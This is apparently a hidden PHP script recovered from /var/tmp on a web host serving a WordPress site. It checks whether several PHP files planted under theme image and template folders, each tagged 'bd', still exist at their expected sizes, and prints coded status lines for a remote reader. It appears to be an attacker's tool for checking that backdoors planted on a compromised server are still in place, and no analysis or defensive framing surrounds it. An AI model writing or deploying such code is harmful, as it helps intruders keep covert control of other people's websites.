File: //var/tmp/.fac
<?php $r = '/home/sfcconst/public_html'; $x = ["/wp-content/themes/post-1784823168/assets/images/custom_functions_1784823168.php"=>"bd@@25493@@624",
"/wp-content/themes/post-1784823168/assets/images/custom_functions_1784823168.php"=>"bd@@29083@@624",
"/wp-content/themes/post-1784823168/assets/images/custom_functions_1784823168.php"=>"bd@@32668@@624",
"/wp-content/themes/custom_file_4_1784725096/assets/images/search-template-1784725096.php"=>"bd@@2482@@865",
"/wp-content/themes/category-template-1784822689/template-parts/custom_file_1_1784822690.php"=>"bd@@18105@@866",
"/wp-content/themes/post-1784823168/assets/images/custom_functions_1784823168.php"=>"bd@@21907@@624"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');